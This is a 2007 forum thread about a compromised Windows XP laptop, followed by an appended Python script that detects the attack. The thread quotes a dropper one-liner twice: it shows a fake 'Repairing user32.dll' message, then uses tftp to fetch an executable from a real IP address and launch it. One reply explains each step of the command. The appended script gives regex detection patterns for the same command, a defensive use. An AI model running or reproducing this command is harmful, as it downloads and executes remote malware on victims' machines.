-
June 26th, 2007, 06:59 PM
#1
Compromised Windows XP machine
In my company, some people take laptops out in the field, aka the real world..
Many have reported, and I have seen myself, lots of emails being sent after something like this shows up in the start>run window ..
%comspec% /c echo Repairing user32.dll & echo Please Wait... tftp -i 75.132.3.206 GET xpjush.exe & start xpjush&
I've turned the windows firewall back on and I think that'll do it, but I was wondering if the machine was definitely compromised or if it was something that could be stopped.. ?
-
June 26th, 2007, 08:06 PM
#2
Short answer is, yes, you are compromised. It seems to have something to do with VNC.
More info is here:
http://forums.speedguide.net/showthread.php?t=219431
Cheers:
-
June 26th, 2007, 09:42 PM
#3
-
June 27th, 2007, 08:41 AM
#4
Originally Posted by Trevoke
I've turned the windows firewall back on and I think that'll do it, but I was wondering if the machine was definitely compromised or if it was something that could be stopped.. ?
Turning on the XP firewall won't do it. It doesn't block outgoing traffic. Those machines are compromised alright. Better be safe than sorry and reinstall. Don't forget all the service packs and patches too.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
June 27th, 2007, 09:52 AM
#5
The first download, once called, will open the Windows firewall to download the second exe, which, if your AV defs are up to date, should catch the payload.
What happens if a big asteroid hits the Earth? Judging from realistic simulations involving a sledge hammer and a common laboratory frog, we can assume it will be pretty bad. - Dave Barry
-
June 27th, 2007, 01:57 PM
#6
Try an online scan via www.pandasoftware.com or housecall.trendmicro.com
Never hurts to get a second opinion.
“Everybody is ignorant, only on different subjects.” — Will Rogers
-
June 27th, 2007, 02:52 PM
#7
Trevoke, I won't waste your time with what I think, as I agree with the answers here; however, knowing what OS you like to use, I think it could be a neat idea if you set up a machine to sniff traffic and see where this stuff comes in from.
Could be a fun little project for you. I used to do something similar at my college: I would set up my laptop on the network, open up iptraf, watch, then open up wireshark if I wanted a GUI, and kind of watch what was going on.
It's amazing what an expensive firewall used by a college will let in heh.
-
June 27th, 2007, 05:26 PM
#8
A fair idea, gore. I like it. Thanks.
-
June 28th, 2007, 08:32 AM
#9
No problem. And hey if you track them down you might be able to prevent more
-
June 28th, 2007, 09:23 AM
#10
%comspec% /c echo Repairing user32.dll & echo Please Wait... tftp -i 75.132.3.206 GET xpjush.exe & start xpjush&
I think it could be a neat idea if you set up a machine to sniff traffic and see where this stuff comes in from.
Good job they didn't include their IP address in the exploit command as it would be too easy to track them down then....you would have to sniff the network traffic to work it out......
Check your eventvwr and you will see the IP address that they connected from, which will more than likely be the same one that you see in the command they issued.
A breakdown of the command is:
%comspec% is a variable which points to the command prompt exe.
The /c switch tells the command shell to carry out the command passed to it and then terminate.
echo will obviously display whatever follows the command onto the screen - this is just to make the user think something is happening to Windows and can be anything that you want it to be.
Now the host will connect via TFTP to 75.132.3.206; the -i switch tells it to GET (download) the file in octet format, which is the method used to receive exe files.
Then the newly downloaded file is launched.
It is a very common exploit and is mistakenly believed to relate to VNC - whilst VNC is the easiest way to connect to a remote host to issue the command, it is not directly at fault and really does not have much to do with the way the command works and the end result of issuing it.
Normally the first goal would be to see if the Windows firewall is on and, if it is, to add a few exceptions to it to enable the attacker to connect to you on whatever port the newly downloaded application will listen on. If you are not logged in as a local admin then this is negated and the attack will fail. If you are logged in as a local admin then it's time to learn a lesson, as the attacker will probably have spawned a shell with local admin rights and you are pretty much guaranteed of not getting rid of him (if he is any good).
Either way, if someone has run that command then you will now have an application running on your machine that you don't really want.... I would personally go through all the necessary stuff to locate and remove it.
Last edited by Nokia; June 28th, 2007 at 09:33 AM.
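A defender-side check for the pattern Nokia broke down above, added here as an example and not part of the thread: it scans command-line records for the "fake repair echo + tftp GET + start" one-liner and pulls out the TFTP host, the fetched file and the launched program for correlation with the event log. The log records are constructed; the IP and filenames come from the command quoted in this thread.

```python
import re
from dataclasses import dataclass
from typing import Optional

# "tftp [-i] <host> GET <file>" as used in the quoted dropper one-liner.
TFTP_GET = re.compile(
    r"tftp(?:\.exe)?\s+(?:-i\s+)?(?P<host>[\w.\-]+)\s+get\s+(?P<file>\S+)",
    re.IGNORECASE,
)
# Trailing "start <something>" that launches the downloaded file.
START_CMD = re.compile(r"\bstart\s+(?P<exe>[^\s&]+)", re.IGNORECASE)

@dataclass
class TftpDropper:
    host: str                 # TFTP server the file is fetched from
    filename: str             # file requested with GET
    launched: Optional[str]   # argument of the trailing "start", if any
    fake_repair: bool         # decoy "echo Repairing ..." present

def inspect_command_line(cmdline: str) -> Optional[TftpDropper]:
    """Return the indicators if cmdline matches the dropper pattern, else None."""
    m = TFTP_GET.search(cmdline)
    if not m:
        return None
    s = START_CMD.search(cmdline[m.end():])
    return TftpDropper(
        host=m.group("host"),
        filename=m.group("file"),
        launched=s.group("exe") if s else None,
        fake_repair=bool(re.search(r"echo\s+repairing", cmdline, re.IGNORECASE)),
    )

# Constructed sample process-creation records (not real logs): the first is the
# command quoted in the thread, the others are benign or a non-GET tftp use.
SAMPLE_RECORDS = [
    "2007-06-26 18:59:01 cmd.exe %comspec% /c echo Repairing user32.dll & echo Please Wait... tftp -i 75.132.3.206 GET xpjush.exe & start xpjush&",
    "2007-06-26 19:01:12 cmd.exe %comspec% /c dir C:\\Users",
    "2007-06-26 19:02:44 cmd.exe tftp.exe 10.0.0.5 PUT backup.cfg",
]

def find_droppers(records):
    """Run the check over log lines; returns (record, indicators) per hit."""
    return [(rec, ind) for rec in records if (ind := inspect_command_line(rec))]

if __name__ == "__main__":
    for rec, ind in find_droppers(SAMPLE_RECORDS):
        print(f"TFTP dropper: host={ind.host} file={ind.filename} "
              f"launch={ind.launched} decoy={ind.fake_repair}")
```

The host it reports is the address to look for in the event viewer connection records Nokia mentions, and the filename is what to hunt for on disk.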